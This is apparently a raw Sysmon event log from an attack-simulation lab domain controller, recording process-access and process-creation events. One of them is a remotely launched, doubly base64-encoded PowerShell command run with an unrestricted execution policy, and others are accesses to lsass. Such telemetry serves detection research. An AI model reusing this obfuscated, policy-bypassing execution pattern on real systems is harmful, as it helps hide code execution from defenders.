UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcA
QgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6439-6064-4FB3-100000000000}0x10b34f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6439-6064-C702-00000000AD01}3208C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 10341000x800000000000000082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.793{266CAFBE-6439-6064-C602-00000000AD01}49122544C:\Windows\system32\conhost.exe{266CAFBE-6439-6064-C702-00000000AD01}3208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.793{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.793{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.777{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.777{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.777{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.777{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.777{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.777{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.777{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.777{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-6439-6064-C702-00000000AD01}3208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.777{266CAFBE-6439-6064-C502-00000000AD01}45444704C:\Windows\system32\WinrsHost.exe{266CAFBE-6439-6064-C702-00000000AD01}3208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x800000000000000070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.785{266CAFBE-6439-6064-C702-00000000AD01}3208C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcA
QgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6439-6064-4FB3-100000000000}0x10b34f0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-6439-6064-C502-00000000AD01}4544C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x800000000000000069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.777{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:53.777{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:53.777{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
